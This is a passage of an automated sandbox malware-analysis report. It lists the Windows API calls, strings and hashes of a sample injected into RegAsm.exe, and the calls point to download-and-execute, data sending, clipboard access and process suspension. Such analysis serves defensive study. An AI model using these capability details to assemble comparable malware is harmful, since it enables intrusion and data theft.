                            • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                            • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                            • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ManagerStart
                            • String ID:
                            • API String ID: 276877138-0
                            • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                            • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                            • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                            • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                            APIs
                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                            • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID: ACP$OCP
                            • API String ID: 2299586839-711371036
                            • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                            • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                            • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                            • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                            APIs
                            • FindResourceA.KERNEL32 ref: 0041B54A
                            • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                            • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                            • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Resource$FindLoadLockSizeof
                            • String ID: SETTINGS
                            • API String ID: 3473537107-594951305
                            • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                            • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                            • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                            • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                            APIs
                            • __EH_prolog.LIBCMT ref: 004096A5
                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstH_prologNext
                            • String ID:
                            • API String ID: 1157919129-0
                            • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                            • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                            • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                            • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                            APIs
                            • __EH_prolog.LIBCMT ref: 0040884C
                            • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                            • String ID:
                            • API String ID: 1771804793-0
                            • Opcode ID: b1eb176887f564738bcb701d3fa8af3362899acb6c57e34aba652b3bc19319a0
                            • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                            • Opcode Fuzzy Hash: b1eb176887f564738bcb701d3fa8af3362899acb6c57e34aba652b3bc19319a0
                            • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DownloadExecuteFileShell
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                            • API String ID: 2825088817-3056885514
                            • Opcode ID: fe84851e8d7f70732d898fdaef0aba1a4162abd4a1fe116b66043c687c2ffd0e
                            • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                            • Opcode Fuzzy Hash: fe84851e8d7f70732d898fdaef0aba1a4162abd4a1fe116b66043c687c2ffd0e
                            • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$FirstNextsend
                            • String ID: XPG$XPG
                            • API String ID: 4113138495-1962359302
                            • Opcode ID: edb16b4144dcf9e536f362a26b882d6c4348f4f9c8c054f169ec42c10df1cf14
                            • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                            • Opcode Fuzzy Hash: edb16b4144dcf9e536f362a26b882d6c4348f4f9c8c054f169ec42c10df1cf14
                            • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID: p'E$JD
                            • API String ID: 1084509184-908320845
                            • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                            • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                            • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                            • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorInfoLastLocale$_free$_abort
                            • String ID:
                            • API String ID: 2829624132-0
                            • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                            • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                            • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                            • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                            • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                            • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                            • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                            • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                            • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                            • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                            • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                            • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                            • ExitProcess.KERNEL32 ref: 10004AEE
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                            • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                            • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                            • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                            • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                            • ExitProcess.KERNEL32 ref: 0044338F
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                            • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                            • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                            • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$CloseDataOpen
                            • String ID:
                            • API String ID: 2058664381-0
                            • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                            • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                            • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                            • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                            APIs
                            • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                            • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                            • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseHandleOpenResume
                            • String ID:
                            • API String ID: 3614150671-0
                            • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                            • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                            • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                            • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                            APIs
                            • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                            • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                            • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseHandleOpenSuspend
                            • String ID:
                            • API String ID: 1999457699-0
                            • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                            • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                            • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                            • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                            APIs
                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: FeaturePresentProcessor
                            • String ID: MZ@
                            • API String ID: 2325560087-2978689999
                            • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                            • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                            • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                            • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID:
                            • String ID: .
                            • API String ID: 0-248832578
                            • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                            • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                            • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                            • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .
                            • API String ID: 0-248832578
                            • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                            • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                            • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                            • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                            • String ID: JD
                            • API String ID: 1084509184-2669065882
                            • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                            • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                            • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                            • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID: GetLocaleInfoEx
                            • API String ID: 2299586839-2904428671
                            • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                            • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                            • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                            • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                            Memory Dump Source
